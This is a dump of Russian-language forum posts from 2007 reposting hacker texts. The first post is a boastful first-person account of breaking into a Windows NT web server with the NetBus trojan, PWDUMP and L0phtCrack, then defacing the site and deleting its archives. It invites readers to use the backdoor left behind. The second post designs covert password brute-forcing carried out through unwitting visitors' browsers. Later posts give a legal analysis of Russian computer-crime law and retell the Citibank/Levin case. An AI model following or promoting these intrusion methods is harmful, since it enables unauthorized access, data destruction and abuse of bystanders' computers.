продолжительное время,&#160; но админ крутился где то там и поднимал его (при этом ничего не понимая)) :) Этот вариант отпал. Ситуация усложнялась.&#160; Целый следующий день мы шарились в поисках експлоитов, которые можно было бы поюзать на этом серваке, и наконец я вспомнил, что где то видел что-то такое веселое для НТ (А именно БО для НТ ).Угадайте где я это нашел ? На нашей доброй старом Хакзоне,&#160; листая архивы обзора.&#160; Эта штука называлась NETBUS 1.60 (линк не работал,&#160; по Алтависте я быстро нашел где слить его).&#160; Потом я вырубился и пошел спать. (с улыбкой умиления на лице :) ) </p> <p>Ночь уже не помню какая : </p> <p>Мы залили сервер для NETBUS'а в /scripts, и тем же способом (описан выше) запустили его на удаленном компе.&#160; Подсоединившись клиентом NETBUS'а, я сразу пошел в File Manager (в нем такая опция есть). И стал собирать информацию о структуре каталогов и т.д. (при плохом коннекте он это делает ой как долго).Так мы получили хоть и не полноценный, но хоть какой то доступ ко всем дискам и каталогам (конкретно на копирование,&#160; запись и тд) Первым делом пошли в WINNT/REPAIR и сперли SAM._ </p> <p>Наше разочарование было очень велико, т.к. этот сам оказался старый- старый (Repair дисков не делал админ, гад). И там было всего два пользователя Guest и Administrator без паролей, т.е ОООчень старый. Решили пока просто полазить по диску - поглядеть, что тут есть, и где лежит главная страничка.&#160; Это оказалось трудно, т.к. вопреки предположениям она находилась не в /wwwroot, но после долгих и нудный поисков (пересмотра пары десятков страниц INDEX.htm ) мы нашли ту, что надо, и в наглую проверили, закачав текстовик с таким именем (хехе), потом, естественно, вернув все обратно.&#160; Мой друган стал заниматься страницей (в смысле лепить нашу, которую мы потом поставили), а я пока испробовал вполне приличные возможности NETBUS и думал как же нам сорвать пароль админа.&#160; Но ничего не приходило мне в голову. </p> <p>Следующая ночь: </p> <p>С красными невыспанными глазами я подползаю к компьютеру, мы уже договорились ставить страничку сегодня, и я по-своему рад.&#160; Тут появился наш третий друган (Lazybones) и активно принялся входить в курс дела (т.е лазить по диску, толкать идеи и тд).&#160; В таком состоянии Lazy и другой парень обнаружили электронную банковскую систему расчета (или как это называется?) Tango3, мы поглядели, ознакомились и решили,&#160; что так бросать сервак не стоит,&#160; но надо дать шанс админу (поставить свою страничку, чтоб он одумался), и стали обсуждать вариант странички, который сделал друган. ( Это сопровождалось ругательствами и 5-ти минутным разладом комманды, наверное из-за того, что все (особенно я) были невыспавшимися и на нервах). Но все согласовалось, и мы принялись заливать.&#160; После этого страничка выглядела так. </p> <p>Страничка не продержалась и получаса.&#160; Админ там крутился все время (наверное из за разницы во времени). Админ сглупил. ....единственное, что он сделал, было то,что он закрыл юзеру TEST доступ к ФТП !!!!! Где мы и не были то ни разу (ну может разок),&#160; &#160;а на шары оставил тот же пароль,&#160; а также оставил наш NETBUS в /scripts -&#160; короче говоря, ничего не сделал.&#160; Нас это сильно загрузило, т.к. мы как бы приняли обязанности показать, какой он дуб.&#160; &#160;Днем я снова залил страницу,&#160; она продержалась часа 1,5.&#160; Реакции опять никакой не было. </p> <p>Следующая ночь : </p> <p>Выделывая невероятные штуки и страшно извращаясь, мы так и не смогли взять админовские права.&#160; Усталость надвигалась, а желание бросить все это и ощущение собственной тупости ( :) страшно, да? ), давило все сильнее и сильнее. </p> <p>Решение появилось неожиданно,&#160; а вернее даже предположение,&#160; оно оказалось настолько просто, что я просто обалдел и решил его проверить.&#160; Решение состояло в том,&#160; что я понял, что проги-то из /scripts запускаются не под юзернеймом TEST, а с того самого web-аккаунта, из чего можно сделать вывод, что пароли можно элементарно сдампить из реестра с помощью PWDUMP.exe. Я быстренько залил это дело в /scripts и пустил из бровсера.&#160; И что же я увидел,&#160; о чудо, я увидел все пароли (естественно, в закодированном виде) прямо в окне моего бровсера.&#160; Это дело я сохранил как текстовик и дал на сьедение L0phtCrack'у, по словарю он мне открыл почти все пароли (они были элементарными) и за ночь BRUTEFORCE'ом нашел и админовский,&#160; тоже не очень сложный! Дас ис гут ! (распространенное исконно русское выражение). </p> <p>Я послал мессаги членам комманды,&#160; и пошел спаточки. </p> <p>Ночь уже со счета сбился какая : </p> <p>Я делюсь паролями с ребятами, и мы начинаем активную деятельность Админов.&#160; Вначале заходим в /iisadmin/default.html (кто не знает, это для удаленного управления WWW,FTP,Gopher сервисами).Там заходим под админом, меняем алиасы на ФТП (а именно делаем, чтобы с ФТП был доступен диск E :\ где лежит интересная инфа). </p> <p>И принимаемся шариться в поисках интересных вещей (а именно баз данных,&#160; документов и т.д. (не сочтите за вандалов)).За пару дней поиска ничего дельного не нашли и решили выжидать что админ предпримет. ..... </p> <p>Много времени спустя : </p> <p>Тупость админа нас доканала. Он не сделала практически ничего чтобы защитить свой сервак,&#160; &#160;и мы дружным советом решили кончать с ним. Собравшись поздним вечером,&#160; стали удалять все, что было дорого посетителям этого сайта (а именно архивы газетных номеров). Перед этим решили поменять пароль админа с помощью стандартного НТевого средства User Manager. И поменяли на довольно длинный - superpupergod (раньше же был pralpha), чтобы он помучился, если вздумает ломать дубово. Далее удалили все копии настоящей странички (чтобы наша подольше подержалась:))Сервак благодаря тупости админа принял такой вид. </p> <p>Я отвалился и пошел спать. ... </p> <p>И последнее : </p> <p>Админ оказался намнооого дурнее, чем я думал, а главное самоувереннее !&#160; Он восстановил все с резервной копии диска и поменял пароли, но на этой копии оказалась и нами оставленная дыра (в каталоге /scripts файл Patch.exe, который является сервером NETBUS ), так что вы можете сами исследовать их диск даже сейчас и, естественно, получить права админа и т.д. ! (может что интересное найдете ) </p> <p>Резюме : </p> <p>АДМИНЫ, не надо быть такими тупыми! Заметив попытку взлома, ЛАТАЙТЕ ДЫРЫ. (не относится к русским админам ) <br />Заметьте, как локальный баг помог нам взять админовский аккаунт. (к исследователям сети ). </p> <p>P.S. Если кто не знает, пароли из SAM._ достаются командой expand !</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 21:59:13 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=31#p31 https://viktoro2007.apbb.ru/viewtopic.php?pid=30#p30 <p>Всем известна старая атака по словарю. А так же ее дополнение ( имеется в виду атака с нескольких машин ). В общем случае это выглядит так : <br />1. Клиент(далее Crk-client) обращается к серверу(далее Crk-server) за очередной порцией паролей <br />2. Crk-server помечает эту порцию как находящуюся в работе <br />3. Crk-client пробует все пароли из этой порции . <br />а) Если один из них подошел , отправляется сообщение на Crk-server, и на этом заканчиваем перебор. <br />б) Если нет то Crk-client отсылает на Crk-server сообщение об окончании перебора и берет новую порцию. <br />в) Если соединение разрывается по ошибке или Crk-client завис, то он ,естественно ,ничего не отправляет. <br />4. Crk-server получает сообщение об окончании перебора ( см.3б ), тогда эта порция удаляется как уже обработанная . Или , по time-out'у , Crk-server помечает эту порцию как необработанную ( см.3в ) </p> <p>Теперь непосредственно сама идея. </p> <p>Рассмотрим например chat.ru(далее сервер). Он предоставляет следующие виды сервиса : <br />1. Размещение страниц <br />2. Почту ( как POP3 , так и SMTP ) <br />и т.д. ( остальное нас не интересует) </p> <p>Рассмотрим как можно организовать перебор пароля на ЛЮБОЙ сервис данного сервера. </p> <p>Crk-client можно написать в виде апплета на яве и положить апплет на сервер. Это делается для того , что бы перебором паролей занимались посетители этой страницы ( даже не подозревая об этом ). В логах сервера перебор будет разнесен во времени и пространстве, т.е. попытки будут происходить через неравные промежутки времени и из разных мест. И к тому же невозможно будет определить кто же в действительности подбирает пароль. </p> <p>Этот апплет может коннектиться только с тем сервером откуда он был загружен (chat.ru). Нам это и нужно. </p> <p>Проблема в следующем: как разместить на сервере Crk-server ? Очевидно , что это не получится . Покажем как можно обойтись без Crk-server'а ... </p> <p>Регистрируем два аккаунта(далее WordList и TMP) на сервере, размещаем HTML-страничку с апплетом Crk-client, а словарь ложим в почтовый ящик (WordList) на сервере. Словарь необходимо разбить на порции , например по 20 паролей. При этом каждая порция лежит отдельным письмом. Crk-client при запуске, обращается на WordList по протоколу POP3 и берет первое-же письмо ( удаляя его с WordList , но отсылая его по SMTP на TMP). Далее Crk-client начинает перебор. Если пароль успешно найден, отправляем его по SMTP себе :)) Если перебор завершился впустую , удаляем из TMP эту порцию . Здесь может возникнуть проблемма , когда одновременно работают несколько клиентов. Но &quot;свою&quot; порцию можно найти используя команду POP3 TOP msg n. </p> <p>Если Crk-client не доработал из-за ошибки , то эта порция не потеряется и ее можно переместить из TMP в WordList . Делать это придется или вручную ( что нежелательно ) или возложить эту функцию на Crk-client. Тут возникает еще одна проблема, как отличить в TMP порции которые обрабатываются сейчас от тех которые надо переместить в WordList . Для этого нужно анализировать дату отправки порции и текущее время. Если разница порядка часа , то эту порцию перемещаем в WordList. </p> <p>Скорость перебора зависит от качества связи с сервером и от количества посетителей этой странички. Как сделать страничку посещаемой - тема для отдельной статьи :))) </p> <p>Сейчас я работаю над реализацией этого алгоритма. Пока что это только теория. В процессе работы возникло сомнение , а может ли апплет работать с почтовыми протоколами ? Оказалось, может, пример прилагается . </p> <p>Теперь немного о применение вышеописанного. На первый взгляд может показаться , что это работает только для халявных серверов , но это не так. Это работает и для серверов провайдеров , если только HTTP , POP3 и SMTP ослуживаются одной машиной. </p> <p>P.S. С некоторыми изменениями, этот алгоритм можно использовать для серверов которые предоставляют только HTTP. Правда для этого сервер должен поддерживать методы DELETE и PUT , ну и GET , естественно.</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 21:57:56 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=30#p30 https://viktoro2007.apbb.ru/viewtopic.php?pid=29#p29 <p>Целью настоящей работы является попытка несколько развеять устоявшееся мнение о полной ненаказуемости хакерской деятельности основываясь на действующем российском законодательстве. При анализе деятельности и определении мер ответственность основной акцент делается на уголовной ответственности, как наиболее суровой и четко регламентированной. Представляется, что исчерпывающе рассматривать меры гражданско-правовой ответственности не представляется целесообразным в связи с множеством их особенностей в каждом конкретном случае. </p> <p>В настоящей работе дается попытка классифицировать (с юридической точки зрения) различные направления деятельности многотысячной армии российских хакеров. Предложенная классификация, как и основные положения настоящего материала являются личным мнением автора, поэтому возможно статья не отвечает требованиям всесторонности, полноты и объективности. Возможно, некоторые положения не бесспорны, поэтому автор с удовольствием примет замечания и конструктивную критику. </p> <p>Для удобства восприятия и изложения, правонарушения связанные с использованием компьютера (их сети) разделены на те, когда компьютерная информация является основной целью посягательства и те, когда компьютер и/или сеть являются средством достижения иных целей. </p> <p>Итак, классификация: </p> <p>I. Компьютерная информация является целью посягательства.<br />1. Редактирование программы.<br />На этот счет отечественное законодательство содержит ряд интересных положений, как допускающих подобную деятельность, так и карающих её. </p> <p>В соответствии со ст. 25 Закона РФ &quot;Об авторском праве и смежных правах&quot;, лицо, правомерно владеющее экземпляром программы для ЭВМ, вправе без получения разрешения автора или иного обладателя исключительных прав на использование произведения и без выплаты дополнительного вознаграждения внести в программу для ЭВМ или базу данных изменения, осуществляемые исключительно в целях ее функционирования на технических средствах пользователя, осуществлять любые действия, связанные с функционированием программы для ЭВМ или базы данных в соответствии с ее назначением, а также исправление явных ошибок, если иное не предусмотрено договором с автором. </p> <p>В соответствии с п.3 ст. 25, применение положений статьи не должно наносить неоправданного ущерба нормальному использованию программы для ЭВМ или базы данных и не должно ущемлять необоснованным образом законные интересы автора или иного обладателя исключительных прав на программу для ЭВМ или базу данных. </p> <p>Положения указанного закона дублируются в ст. 15 Закона РФ &quot;О правовой охране программ для электронных вычислительных машин и баз данных&quot;, поэтому приводить её целиком не представляется целесообразным. Однако, ст. 15, помимо указанных, предоставляет законному владельцу программы право &quot;осуществлять адаптацию программы для ЭВМ или базы данных&quot;. Под &quot;адаптацией&quot; законодатель понимает &quot;внесение изменений, осуществляемых исключительно в целях обеспечения функционирования программы для ЭВМ или базы данных на конкретных технических средствах пользователя или под управлением конкретных программ пользователя&quot;, что, конечно же, допускает широкое толкование закона. </p> <p>С другой стороны, в зависимости от цели редактирования программы, подобная деятельность может быть и уголовно наказуема, например по Статье 273 Уголовного Кодекса РФ (&quot;Создание, использование и распространение вредоносных программ для ЭВМ&quot;) устанавливающей ответственность за &quot;внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации&quot;. </p> <p>Так же в данном случае возможно нарушение авторских прав, что может предполагать как уголовную (ст. 146 УК РФ &quot;Нарушение авторских и смежных прав&quot;), так и гражданско-правовую ответственность. </p> <p>Таким образом получается, что законодатель в целом допускает редактирование чужих программ если оно осуществляется в разумных пределах. К сожалению, несовершенство законодательства и широкие возможности его толкования, допускают неоднозначное его понимание, что фактически расширяет перечень оснований (и обоснований) редактирования чужих программ. </p> <p>2. Создание &quot;вспомогательной&quot; программы, взаимодействующей с имеющейся <br />а) с изменением исходного кода, <br />б) без такового изменения.<br />Представляется, что данная деятельность может попадать под действие ст. 273 УК РФ, т.к. она устанавливает ответственность за &quot;Создание программ для ЭВМ: заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети&quot;. </p> <p>В тексте статьи не указывается местонахождение информации подвергающейся воздействию, поэтому можно предположить, что статья устанавливает ответственность за изменение программы как на носителе, так и в памяти компьютера. Безусловно, второй вариант юридически более трудно доказуем, но не является невозможным. Применение первого варианта чревато также нарушением авторских прав, что предполагает применение соответствующих норм уголовного или гражданского права. </p> <p>3. Декомпилирование программы. <br />Декомпилирование программы по отечественному законодательству не носит противоправный характер, если осуществляется в соответствии с п. 2 ст. 25 Закона РФ &quot;Об авторском праве и смежных правах&quot;. В соответствии с ним, лицо, правомерно владеющее экземпляром программы для ЭВМ, вправе без согласия автора или иного обладателя исключительных прав и без выплаты дополнительного вознаграждения воспроизвести и преобразовать объектный код в исходный текст (декомпилировать программу для ЭВМ) или поручить иным лицам осуществить эти действия, если они необходимы для достижения способности к взаимодействию независимо разработанной этим лицом программы для ЭВМ с другими программами, которые могут взаимодействовать с декомпилируемой программой ( а также для изучения кодирования и структуры программы [Закон о правовой охране программ для ЭВМ и БД] ), при соблюдении следующих условий: </p> <p>1) информация, необходимая для достижения способности к взаимодействию, ранее не была доступна этому лицу из других источников; </p> <p>2) указанные действия осуществляются в отношении только тех частей декомпилируемой программы для ЭВМ, которые необходимы для достижения способности к взаимодействию; </p> <p>3) информация, полученная в результате декомпилирования, может использоваться лишь для достижения способности к взаимодействию независимо разработанной программы для ЭВМ с другими программами, не может передаваться иным лицам, за исключением случаев, если это необходимо для достижения способности к взаимодействию независимо разработанной программы для ЭВМ с другими программами, а также не может использоваться для разработки программы для ЭВМ, по своему виду существенно схожей с декомпилируемой программой для ЭВМ, или для осуществления любого другого действия, нарушающего авторское право. </p> <p>Итак, очевидно, что декомпилирование программы не носит противоправный характер, если осуществляется для достижения способности к взаимодействию программам, для изучения кодирования и структуры программы или обосновывается этими целями. </p> <p>4. Копирование программного обеспечения.<br />Законодательство предусматривает только один случай, когда копирование ПО не носит противоправный характер. В соответствии с п. 1 ст. 25 Закона РФ &quot;Об авторском праве и смежных правах&quot;, лицо, правомерно владеющее экземпляром программы для ЭВМ или базы данных, вправе без получения разрешения автора или иного обладателя исключительных прав на использование произведения и без выплаты дополнительного вознаграждения изготовить копию программы для ЭВМ или базы данных при условии, что эта копия предназначена только для архивных целей и для замены правомерно приобретенного экземпляра в случаях, когда оригинал программы для ЭВМ или базы данных утерян, уничтожен или стал непригоден для использования. При этом копия программы для ЭВМ или базы данных должна быть уничтожена в случае, если владение экземпляром этой программы для ЭВМ или базы данных перестает быть правомерным. </p> <p>Как указывается в п.3 этой же статьи, применение её положений не должно наносить неоправданного ущерба нормальному использованию программы для ЭВМ или базы данных и не должно ущемлять необоснованным образом законные интересы автора или иного обладателя исключительных прав на программу для ЭВМ или базу данных. </p> <p>Таким образом, получается, что законно копирование программного обеспечения вполне возможно, при наличии обоснования указанного в законе, при этом, конечно, желательно быль &quot;правомерным владельцем программы&quot;. </p> <p>5. Использование или распространение противозаконных программ и их носителей.<br />Под противозаконной в настоящем пункте понимается программа, которая ориентированная на несанкционированное уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети. За &quot;использование либо распространение таких программ или машинных носителей с такими программами&quot; предусмотрена уголовная ответственность в ст. 273 УК РФ. </p> <p>В зависимости от характера вреда возможно наступление гражданско-правовой ответственности. </p> <p>В данном пункте не идет речь о &quot;противозаконном использовании&quot; или &quot;противозаконном распространении&quot; программного обеспечения, связанного с нарушением авторского права, т.к. это является отдельной областью, рассмотрение которой достойно отдельного рассмотрения. </p> <p>6. Деятельность в компьютерной сети.<br />Современное Российское гражданское право почти не регламентирует деятельность связанную с компьютерными сетями в России, не регулирует взаимоотношения фирм - провайдеров и клиентов, правила поведения в сети и рамки его допустимости. </p> <p>Однако, уголовное законодательство предусматривает два случая наступления ответственности за деяния связанные с компьютерной сетью:</p> <p>а) Статья 272 УК РФ (Неправомерный доступ к компьютерной информации), устанавливает ответственность за &quot;неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети&quot;. </p> <p>б) Статья 274 УК РФ (Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети) предусматривает ответственность за &quot;нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети лицом, имеющим доступ к ЭВМ, системе ЭВМ или их сети, повлекшее уничтожение, блокирование или модификацию охраняемой законом информации ЭВМ, если это деяние причинило существенный вред&quot;. Понятие &quot;существенности&quot; вреда является оценочным и в каждом конкретном случае определяется индивидуально. </p> <p>В данном разделе достаточно часто упоминались те или иные формы нарушения авторского права. Каковы же санкции, которые могут быть применены к нарушителю? </p> <p>Во-первых, уголовная ответственность, - ст. 146 (Нарушение авторских и смежных прав) УК РФ. </p> <p>Во-вторых, административная, - ст. 150.4 (Продажа, сдача в прокат и иное незаконное использование экземпляров произведений или фонограмм) Кодекса РСФСР об административных правонарушениях (эта статья применима к компьютерным программам, т.к. в статье 7 закона &quot;Об авторском праве и смежных правах&quot;, программы для ЭВМ приравнены к литературным произведениям со всеми вытекающими последствиями). </p> <p>В-третьих, гражданско-правовая ответственность. В частности, при нарушении авторских прав, в соответствии со ст.18 Закона о правовой охране программ для ЭВМ и БД, автор программы и иные правообладатели вправе требовать: </p> <p>признания прав; <br />восстановления положения, существовавшего до нарушения права, и прекращения действий, нарушающих право или создающих угрозу его нарушения; <br />возмещения причиненных убытков, в размер которых включается сумма доходов, неправомерно полученных нарушителем. Статья 15 Гражданского кодекса РФ, определяет, что под убытками понимаются: а) расходы, которые лицо, чье право нарушено, произвело или должно будет произвести для восстановления нарушенного права; б) утрата или повреждение его имущества (реальный ущерб); в) неполученные доходы, которые это лицо получило бы при обычных условиях гражданского оборота, если бы его право не было нарушено (упущенная выгода). Если лицо, нарушившее право, получило вследствие этого доходы, лицо, право которого нарушено, вправе требовать возмещения наряду с другими убытками упущенной выгоды в размере не меньшем, чем такие доходы; <br />выплаты нарушителем компенсации в определяемой по усмотрению суда, арбитражного или третейского суда сумме от 5000-кратного до 50000-кратного установленного Законом размера минимальной месячной оплаты труда, в случаях нарушения с целью извлечения прибыли, вместо возмещения убытков. Такая норма содержится в Законе &quot;О правовой охране программ для электронных вычислительных машин и баз данных&quot;, однако, следует скорее применять ст. 49 Закона &quot;Об авторском праве и смежных правах&quot;, т.о. правильнее утверждать, что автор программы (иные правообладатели) вправе требовать выплаты компенсации в сумме от 10 до 50000 минимальных размеров оплаты труда определяемой по усмотрению суда или арбитражного суда, вместо возмещения убытков или взыскания дохода; <br />принятия иных, предусмотренных законодательными актами мер, связанных с защитой их прав (их неполный перечень даётся в статье 12 Гражданского Кодекса РФ). <br />&quot;Помимо возмещения убытков, взыскания дохода или выплаты компенсации в твердой сумме суд или арбитражный суд за нарушение авторских или смежных прав взыскивает штраф в размере 10 процентов от суммы, присужденной судом в пользу истца&quot; - подобное правило в виде возможной санкции содержится в Законе &quot;О правовой охране программ для электронных вычислительных машин и баз данных&quot; и в виде обязательной - в Законе &quot;Об авторском праве и смежных правах&quot;. </p> <p>Нелегальные экземпляры программного обеспечения подлежат обязательной конфискации по решению суда. Конфискованные экземпляры уничтожаются или передаются обладателю авторских или смежных прав по его просьбе. Как правило, при этом, также, конфискуются материалы и оборудование, используемые для изготовления и воспроизведения незаконных экземпляров программного обеспечения. </p> <p>II. Компьютер и/или сеть являются средством достижения целей. <br />Все выше рассмотренное можно с определенной долей условности считать верным лишь при условии, что компьютер (компьютерная информация, сеть) используется как конечная цель деятельности, а если этот инструментарий рассматривать как средство (например, для искажения информации на счете в банке) то тут возможна ответственность и по другим статьям УК РФ. Например, если была совершена кража денежных средств (ст.158 УК РФ) с нарушением правил эксплуатации сети (ст.274 УК РФ), то уголовная ответственность возможна по совокупности преступлений. </p> <p>Не претендуя на исчерпывающий список противоправных деяний, которые могут быть совершены с использованием компьютера и/или сети, ниже представлен перечень статей УК РФ под действие которых они могут попадать: </p> <p>Статья 129. Клевета (распространение заведомо ложных сведений, порочащих честь и достоинство другого лица или подрывающих его репутацию). <br />Статья 130. Оскорбление (унижение чести и достоинства другого лица, выраженное в неприличной форме). <br />Статья 137. Нарушение неприкосновенности частной жизни (незаконное собирание или распространение сведений о частной жизни лица, составляющих его личную или семейную тайну, без его согласия либо распространение этих сведений в публичном выступлении, публично демонстрирующемся произведении или средствах массовой информации, если эти деяния совершены из корыстной или иной личной заинтересованности и причинили вред правам и законным интересам граждан). <br />Статья 138. Нарушение тайны переписки, телефонных переговоров, почтовых, телеграфных или иных сообщений. <br />Статья 146. Нарушение авторских и смежных прав (незаконное использование объектов авторского права или смежных прав, а равно присвоение авторства, если эти деяния причинили крупный ущерб). <br />Статья 147. Нарушение изобретательских и патентных прав (незаконное использование изобретения, полезной модели или промышленного образца, разглашение без согласия автора или заявителя сущности изобретения, полезной модели или промышленного образца до официальной публикации сведений о них, присвоение авторства или принуждение к соавторству, если эти деяния причинили крупный ущерб). <br />Статья 158. Кража (тайное хищение чужого имущества). <br />Статья 159. Мошенничество (хищение чужого имущества или приобретение права на чужое имущество путем обмана или злоупотребления доверием). <br />Статья 163. Вымогательство (требование передачи чужого имущества или права на имущество или совершения других действий имущественного характера под угрозой применения насилия либо уничтожения или повреждения чужого имущества, а равно под угрозой распространения сведений, позорящих потерпевшего или его близких, либо иных сведений, которые могут причинить существенный вред правам или законным интересам потерпевшего или его близких). <br />Статья 165. Причинение имущественного ущерба путем обмана или злоупотребления доверием. <br />Статья 167. Умышленные уничтожение или повреждение имущества (если эти деяния повлекли причинение значительного ущерба). <br />Статья 168. Уничтожение или повреждение имущества по неосторожности (в крупном размере). <br />Статья 182. Заведомо ложная реклама (использование в рекламе заведомо ложной информации относительно товаров, работ или услуг, а также их изготовителей (исполнителей, продавцов), совершенное из корыстной заинтересованности и причинившее значительный ущерб). <br />Статья 183. Незаконные получение и разглашение сведений, составляющих коммерческую или банковскую тайну (собирание сведений, составляющих коммерческую или банковскую тайну, путем похищения документов, подкупа или угроз, а равно иным незаконным способом в целях разглашения либо незаконного использования этих сведений). <br />Таким образом, представляется, что, например, если был совершен только &quot;неправомерный доступ к компьютерной информации&quot;, то предполагается ответственность по ст.272 УК РФ. Если же с использованием компьютера было осуществлено &quot;нарушение тайны переписки, телефонных переговоров, почтовых, телеграфных или иных сообщений&quot;, то предполагается ответственность по ст.138 УК РФ. Ну а если &quot;нарушение тайны переписки, телефонных переговоров, почтовых, телеграфных или иных сообщений&quot; было осуществлено с &quot;неправомерным доступом к компьютерной информации&quot;, то возможна ответственность по совокупности деяний. </p> <p>Рассмотрение различных направлений хакерской деятельности в сочетании с законодательными актами показывает сильное отставание и несовершенство современной правовой системы. Тем не менее, видно, что российское право уже на современном этапе позволяет привлекать к ответственности (в т.ч. и уголовной) за наиболее опасные деяния в рассматриваемой сфере. </p> <p>Хочется также отметить, что если для привлечения к ответственности по нормам уголовного кодекса необходимо заставить работать сложный уголовно-правовой механизм привлечения к ответственности, в сочетании с соответствующим желанием и рвением правоохранительных органов, то для привлечения к гражданско-правовой ответственности достаточно желания любого лица, право которого нарушено. Впрочем, механизм привлечения к уголовной ответственности также может функционировать весьма оперативно при наличии определенного давления с пострадавшей стороны. </p> <p>Итак, представляется, что общая информация по современному состоянию законодательства дана, ну а что делать с законом: соблюдать, обходить или нарушать пусть каждый для себя решает сам, но помните, что даже &quot;великий мошенник ХХ века&quot; Остап Бендер всегда чтил уголовный кодекс!</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 21:56:47 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=29#p29 https://viktoro2007.apbb.ru/viewtopic.php?pid=28#p28 <p>Лето 1995 года было действительно жарким, в это время мировая общественность всколыхнулась от сенсационной новости-простой российский хакер по имени Владимир Левин взломал электронную защиту Сити-Банка и похитил 400 000 доллаpов. Попpобуем пpоанализиовать эту истоpию еще pаз с высот 1997&#160; года. </p> <p>Для этого я пpедлагаю pассмотpеть тpи веpсии, котоpые на данный момент имеют место. </p> <p>Начнем с официальной. Согласно ей, во взломе банка участвовало несколько человек. Сначала pаботал один компьютеp, потом втоpой, потом тpетий и т.д. Благодаpя такому &quot;штуpму&quot; система защиты дpогнула и &quot;хакеpам&quot; удалось похитить деньги. Напомню, что им удалось пеpевести на подставные счета 10 000 000 доллаpов. Вернее, они так считали, что пеpевели. В какой-то момент вpемени администpатоу банка удалось засечь их деятельность и веpнуть 960 000 доллаpов обpатно. Но 400 000 доллаpов так до сих поp и не найдено. </p> <p>Втоpая веpсия pождена нашимим пpавоохpанительными оpганами, которые также имеют свой взгляд на пpоизошедшие события. В качестве небольшой пpелюдии к ней скажу несколько слов о хакеpах. Кто они такие и чем занимаются, вам известно. В компьютеpной сети Интеpнет, встpетить наших соотечественников можно где-угодно, особенно пpофессиональных &quot; взломщиков&quot;. Поэтому не исключено, что в опpеделенной момент на ВВS банка находилось несколько наших человек, котоpым было пpосто интеpесно, что находится на их сеpвеpе. </p> <p>А никакого огpабления собственно говоpя не было. Зачем же тогда весь этот шум, спpаведливо спpосите Вы? Да все достаточно пpосто- чтобы напомнить своему пpавительству о так называемой &quot;советской&quot; угpозе, котоpая тепеpь имеет место в такой интеpесной фоpме. Если веpить этой веpсии, то можно понять каким обpазом господин Левин выехал в Англию, где его собственно говоpя и &quot;скpутили&quot;. </p> <p>Вспомните пеpвую веpсию, согласно ей администатоp успел веpнуть 960 000 доллаpов, а так же вычислить откуда идет команда о пеpеводе денег. Если это так, то навеpное логично было бы связаться с нашими пpавоохpанительныими оpганами и задеpжать пpеступника на теpитоpии России. Но этого не было сделано. Почему? Неизвестно. Иными словами, господина Левина&#160; кpуто подставили, pади каких-то там интеpесов. </p> <p>Тепеpь пеpейдем к веpсии тех людей, котоpые лично знали Левина. В свое вpемя он был одним из Санкт-Петеpбугских НОДов сети ФИДО. По отзывам, он чисто психологически не мог совеpшить кpажу. Ну не тот менталитет у него. </p> <p>Что же думают сами &quot;хакеpы&quot; относительно всех этих событий. Вашему коppеспонденту удалось встpетиться с человеком, котоpый, в силу своего хобби, оказался пpактически в центpе всех этих событий. Вот что он мне pасскал: </p> <p>Задолго до того, как произошли всем известные события, несколько российских хакеров из Санкт-Петербурга проникло на BBS банка.Сделать это достаточно просто, пользуясь сетью Интернет. Операционной оболочкой в Сити Банке служила Unix, которая по словам одного из ХАКЕРОВ &quot;является одной большой дырой, проникнуть через которую достаточно легко, если умеешь конечно&quot;. Одним из тех,кто проник в банк был уже достаточно известный, благодаря журналу &quot;Птюч&quot;, хакер по имени Мегазоид. </p> <p>Из pедакционного досье:<br />На самом деле под этим именем скpывается один из самых талантливых пpогpаммистов Санкт-Петебуга.( более известная кличка Пpотозоид) Его достаточно часто можно встpетить в баpе &quot; Fish Fabrique&quot;, котоpый находится на Пушкинской улице. На контакт выйти с ним достаточно сложно. О сеpьезных делах пpедпочитает не говоpить. Хотя если напоить пивом, то сенсации вам обеспечены.<br /> </p> <p>При этом, не стоит думать,что проник он туда с целью перевода себе каких-то денег,абсолютно нет. Просто хакеры- это такие люди, которым интересно посмотреть что там за чертой.( и об этом мы уже говоили во втоpой веpсии) Мегазоид находясь в банке нашел несколько &quot;дыр&quot; в системе защиты и некоторое время ходил по нему как по своему родному дому. Он даже смог пронаблюдать как работники банка переезжали с этажа на этаж и в спешке забыли дискету в одном из компьютеров, а потом три дня ее искали. Естественно,что администратор сети банка очень скоро заметил,что в системе есть кто-то посторонний. Причем сделал он такие выводы только по той причине, что Мегазоид, по сравнению с другими пользователями банка, сделал себе достаточно маленькие права. </p> <p>Нащупав Мегазоида администратор немного удивился и начал активно выпихивать его из сети. В ответ, Мегазоид написал ему письмо с приблизительно следующим содержанием: Я бедный русский хакер из Питера,не трогайте меня, пожайлуста, а я вам за это покажу где у вас бреши в системе защиты. </p> <p>На самом деле Мегазоид немного схитрил,он нашел несколько пробоин в системе,а рассказал только об одной. После того ,как он показал ,где находиться дыра в защите, администратор повел себя абсолютно не по-джентельменски,и элиментарно его вырубил . </p> <p>В ответ на это Мегазоид зашел во вторую брешь и навестил его снова с пламенным приветом из Питера. </p> <p>Наверное вам будет интересно узнать на какой машине работал в этот момент Мегазоид, если вы думаете,что это супернавороченный Пентиум, то вы глубоко ошибаетесь. На самом деле это был терминал,т.е. фактически один монитор с модемом. На жестком диске компьютера банка Мегазоид отвел себе немного места, на котором держал весь свой софт. </p> <p>В один прекрасный момент Мегазоиду срочно потребовались деньги и он продал уже печально известному В.Левину за 100 долларов секрет проникновения через систему защиты банка. </p> <p>а дальше.... </p> <p>Дальше сpаботала либо пеpвая, либо втоpая, либо третья версия. После того, как поизошел веcь этот скандал компетентные оpганы нашего гоpода хоpошенько почистили всех наиболее известных хакеpов. До сих 